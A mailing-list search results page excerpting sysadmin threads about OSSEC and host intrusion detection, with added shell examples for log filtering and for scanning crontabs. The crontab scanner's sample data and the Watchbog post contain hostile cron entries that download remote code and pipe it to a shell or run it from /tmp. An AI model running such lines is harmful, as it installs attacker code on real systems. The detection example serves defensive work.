Displaying 20 results from an estimated 54 matches for "ossec".
2009 Nov 25
1
Puppet custom functions and user permissions
I am busy writing a custom function to automatically add OSSEC agents
to an OSSEC server after installation. Unfortunately, it seems that
puppetmasterd is not respecting the entries in /etc/group in Linux. No
matter how many other groups the puppet user has been added to in
/etc/group, when puppetmasterd runs the custom function the effective/real
user always...
2009 Jun 02
0
OSSEC Recipe?
Hi,
I'm fairly new to Puppet but so far have been very pleased with the
recipes and my own simple scripts. However, I've hit a wall in the
form of OSSEC (http://www.ossec.net/main/).
Most of my servers are running Ubuntu or Debian and neither supports
OSSEC via apt-get. I've thought about setting up my own local
repository to handle this and to also package my own puppet updates.
However, the recommended install of OSSEC is via an interactive...
2009 Nov 28
6
AIDE or OSSEC on CentOS 5.4 x86_64?
Starting with a fresh load and after I finish hardening the load
following the Center for Internet Security (CIS) guidance, I'm wondering
whether AIDE or OSSEC would be a better intrusion detection system.
I installed AIDE and did a quick test of AIDE and after initializing the
db and applying the recent cups update, I found that 1700+ files had
changed. Those are a lot of changes to wade through to determine if
they are legit or not. If that is all tha...
2012 Aug 22
2
Hiera, OSSEC and per-node stuff?
Hi.
I have an interesting use case.
OSSEC is a security tool based on a server-client architecture. The server
generates keys for agents, and every agent has a different key.
Now I want to distribute these keys via Puppet. I've come across Hiera
and installed it, and it works superbly, but how do I store a per-node key
in Hiera?
This is m...
2011 Jun 13
1
Unable to grep 5 mins logs
...pped by the script and append it to another file.
However, the below script is not able to grep the desired logs, so I
need some help in preparing the script. I am running CentOS 5.2
32-bit.
for (( i = 5; i >=0; i-- )) ; do grep $(date "+%a %b %d %R %Y" -d "-$i min") /var/ossec/logs/active-responses.log >> /tmp/newlog.log;done
/var/ossec/logs/active-responses.log format is below
Fri Jun 3 15:38:14 IST 2011 /var/ossec/active-response/bin/host-deny.sh add - 172.31.5.12 1307095694.71353 31151
Fri Jun 3 15:38:14 IST 2011 /var/ossec/active-response/bin/firewall-drop....
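The posted loop misses every line for three reasons: the command substitution is unquoted, so grep receives "Fri" as its pattern and the remaining words as file names; "+%a %b %d %R %Y" yields a zero-padded day and no seconds or time zone ("Jun 03 15:38 2011"), while the log carries "Jun 3 15:38:14 IST 2011"; and a string match on a minute stamp is fragile in any case. The added example below (not from the thread) sidesteps date parsing: each OSSEC active-response entry is one line ending in the alert id and the rule id, and the alert id is "<epoch seconds>.<counter>" (1307095694 in the post's sample is exactly 15:38:14 IST on 3 Jun 2011), so the second-to-last field is a machine-readable timestamp. The sample log is constructed to match the post's format; the function names and the fixed "now" value used in the demo are assumptions.

```shell
#!/bin/sh
# Added example, not the poster's script: select active-response entries from
# the last N minutes by the epoch timestamp embedded in the alert id.
# Line layout in /var/ossec/logs/active-responses.log:
#   <date> <script> <action> <user> <ip> <alert_id> <rule_id>
# where alert_id = "<epoch seconds>.<counter>" (second-to-last field).

# Constructed sample log (assumption: same layout as the post's sample).
# The two 15:38:14 entries are epoch 1307095694; the first is five minutes older.
sample_log() {
    cat <<'EOF'
Fri Jun  3 15:33:14 IST 2011 /var/ossec/active-response/bin/host-deny.sh add - 10.0.0.9 1307095394.71001 31151
Fri Jun  3 15:38:14 IST 2011 /var/ossec/active-response/bin/host-deny.sh add - 172.31.5.12 1307095694.71353 31151
Fri Jun  3 15:38:14 IST 2011 /var/ossec/active-response/bin/firewall-drop.sh add - 172.31.5.12 1307095694.71353 31151
EOF
}

# recent_ar_entries NOW_EPOCH MINUTES < logfile
# Prints every line whose alert id timestamp falls within MINUTES before NOW_EPOCH.
recent_ar_entries() {
    awk -v since="$(( $1 - $2 * 60 ))" '
        NF >= 2 && $(NF-1) ~ /^[0-9]+\.[0-9]+$/ {
            split($(NF-1), id, ".")          # id[1] = epoch seconds of the alert
            if (id[1] + 0 >= since) print
        }'
}

# Line counter that avoids the leading blanks some wc implementations print.
count_lines() { awk 'END { print NR }'; }

# Production use (what the post was trying to do):
#   recent_ar_entries "$(date +%s)" 5 < /var/ossec/logs/active-responses.log >> /tmp/newlog.log
# Demo against the constructed log, pretending "now" is 15:40:00 IST (epoch 1307095800).
sample_log | recent_ar_entries 1307095800 5
```

Because the filter keys on the alert id rather than the printed date, it is unaffected by the server's locale, time zone abbreviation or the two-space padding of single-digit days that `date` emits.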
2007 Sep 26
4
Intrusion Detection Systems
...that I
can't easily control vs. putting strict limits on ssh. We simply have
too many users entering from too many networks many with dynamic IP
addresses.
Enter.... thinking about LIDS or Log Based Intrusion Detection.
I've run across four systems.
Blockhosts, DenyHosts, fail2ban and OSSEC.
DenyHosts apparently only works with ssh, so I've discounted using that.
Is anyone using one of these or something else that I've missed? At
present, I'm leaning towards OSSEC for several reasons. First it seems
very robust. Second, you can set up a server/client structure, so only...
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than cent...
2010 Aug 18
3
Playing with sipvicious ..
... using it as a tool and understanding what it does...
So one part of its toolset identifies valid SIP accounts - and I was under
the impression that alwaysauthreject=yes was supposed to stop this...
However, it sends a request for a highly probably non-existent account,
then sends requests for probably existing accounts and I guess compares
the results - account not found vs. bad
2007 Aug 16
1
meaning and cause of kernel panic ??
...x216
Aug 15 23:01:28 mydomain kernel: eax: 00000000 ebx: c54ee0e0 ecx: ffffffff edx: 00000000
Aug 15 23:01:28 mydomain kernel: esi: c54ee0e4 edi: 00000000 ebp: c1be11e4 esp: c48f8f60
Aug 15 23:01:28 mydomain kernel: ds: 007b es: 007b ss: 0068
Aug 15 23:01:28 mydomain kernel: Process ossec-syscheckd (pid: 11762, threadinfo=c48f8000 task=c75a27e0)
Aug 15 23:01:28 mydomain kernel: Stack: bff7125c c7ff5420 c0180d15 c48f8fa0 c717f920 c0372960 c717f920 c7f2b8b0
Aug 15 23:01:28 mydomain kernel: c0180d15 c018097e c48f8fa0 ffffffda 0856a5dc c717f920 00000000 c0180fcb
Aug 15 23:01:28 m...
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys,
What is the best way to identify a possible user using a botnet with PHP
on the server? And if he is using GET commands, for example, on another server.
Does Apache log outbound connections?
If it is using a file that is not malicious, ClamAV would not identify it.
Thanks
2006 Nov 01
1
Constant regeneration of /etc/ssh/ssh_known_hosts
I've created an ssh_keys class that just makes sure that all my
Puppet managed hosts get the same set of host keys using the
"sshkey" type. I also am starting to play with OSSEC HIDS which is
a host based intrusion detection system. OSSEC HIDS has been
letting me know that the MD5 and SHA1 hashes of
/etc/ssh/ssh_known_hosts have been changing regularly as Puppet runs.
Now, I've not added or changed anything with my ssh keys so I would
expect either:
a) it sees...
2010 Mar 04
8
Intrusion Detection
Hello all,
I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately).
Thank you,
Dan Burkland
2012 May 25
4
PCI/DSS compliance on CentOS
I have a client project to implement PCI/DSS compliance.
The PCI/DSS auditor has stipulated that the web server, application
middleware (tomcat), the db server have to be on different systems.
In addition the auditor has also stipulated that there be a NTP
server, a "patch" server,
The Host OS on all of the above nodes will be CentOS 6.2.
Below is a list of things that would be
2013 Jun 20
2
init.d scripts not starting at boot
...e specific example is crond;
Chkconfig output:
crond 0:off 1:off 2:on 3:on 4:on 5:on 6:off
permissions in init.d:
-rwxr-xr-x 1 root root 2793 Jul 18 2011 crond
The processes that aren't loading are:
Clamd, directadmin, exim, freshclam, httpd, mysqld, ossec, proftpd, sshguard
Any ideas what I need to check/change to resolve this problem?
Thanks everyone!
2019 Nov 14
0
how to know when a system is compromised
This is one where there's probably no limit to what you could do. We have a high-security environment and are using Aide and OSSEC.
Aide has been good at reporting file system changes and is very granular, the dilemma is what to monitor and what to ignore (keep from being inundated with reports of innocuous changes at the risk of missing something). However, it is not daemon-based so changes between runs which are undone go...
2011 Jul 26
3
file2ban
I want to add an entry to a database every time a brute force registration
attempt is done.
from this database we are updating cisco routers with our ban list so our
entire network is protected.
The database side of things is working and has been for some time. I really
would like to add the file2ban side of it to protect our asterisk system
better.
How would I best go about doing this?
2019 Nov 14
4
how to know when a system is compromised
How do you know when a Linux system has been compromised?
Every day I watch our systems with all the typical tools, ps, top, who,
I watch firewall / IPS logs, I have logwatch setup and mailing daily
summaries to me and I dive deeper into logs if something looks suspicious.
What am I missing or not looking at that you security gurus are looking at?
I subscribe to the CentOS and SANS
2010 Feb 10
3
saslauthd attack
...be a kiddie script. Mostly trying to access several of our servers with
the username anna. All failed... in fact I don't think we have a user
anna on any of our servers. Meanwhile...
I'm running Sendmail. This pertains to CentOS 4 and 5 servers. I'm also
running fail2ban on some and OSSEC on others. So far, no blocking is
being done. When I look at the logs all I find is under messages and
here is a sample:
Feb 10 05:23:08 neptune saslauthd[3370]: do_auth : auth failure:
[user=anna] [service=smtp] [realm=] [mech=shadow] [reason=Unknown]
Feb 10 05:23:25 neptune saslauthd[...
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently I am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
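The manual steps above remove one known entry but do not show how to find it, or others like it, in the first place. Added here as an example (not from the thread or the linked blog post) is a scan over crontab text for entries that download and execute remote content, the persistence mechanism the quoted Watchbog entry uses. The sample crontab is constructed: the pastebin URL and the apigee user come from the post, the tail of that cron line (cut off in the post) and the other entries are invented, the function name is my own, and the pattern list is an assumption about what is worth flagging, so tune it for your hosts.

```shell
#!/bin/sh
# Added example, not from the thread: flag crontab entries that fetch and run
# remote content. Reads crontab text on stdin so it runs offline; in production
# feed it every user's crontab, e.g.
#   for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u "$u" 2>/dev/null; done | suspicious_cron_entries
# and also check /etc/cron.d and /etc/crontab, which this does not read.

# Constructed sample crontab. Line 3 follows the post (the part after "wget"
# is invented); line 4 is an invented drop-to-/tmp variant; the rest are benign.
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|sh
30 * * * * wget -q -O /tmp/.x http://203.0.113.10/x && chmod +x /tmp/.x && /tmp/.x
*/5 * * * * /usr/bin/python /opt/app/healthcheck.py
EOF
}

# suspicious_cron_entries < crontab-text
# Prints non-comment lines that use curl or wget together with one of:
# a paste site, a pipe into sh/bash, a write under /tmp or /dev/shm, or
# output to stdout (-O- / -O -), which is almost always piped into a shell.
# The indicator list is an assumption; extend it for your environment.
suspicious_cron_entries() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        /(curl|wget)/ && /(pastebin\.com|[|][ \t]*(ba)?sh([ \t]|$)|\/tmp\/|\/dev\/shm\/|-O-|-O[ \t]+-)/ { print }
    '
}

# Demo against the constructed crontab: prints the two malicious entries.
sample_crontab | suspicious_cron_entries
```

Treat a hit as a lead, not a verdict: the next step is to see what the cron entry actually fetches and which process installed it, since a cleanup that only deletes the line leaves the dropper and any other persistence in place.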
2007 Oct 04
2
Internet threat management package
... Looking for a recommendation for a commercial threat management
package. ( Think antivirus / antispy / anti-rootkit -- all rolled into
one engine ), similar to this product:
http://usa.kaspersky.com/products_services/work-space-security.php,
which currently only supports one kernel for FC6, and RHEL4, officially.
Here's the background. Need to make a decision and investment for a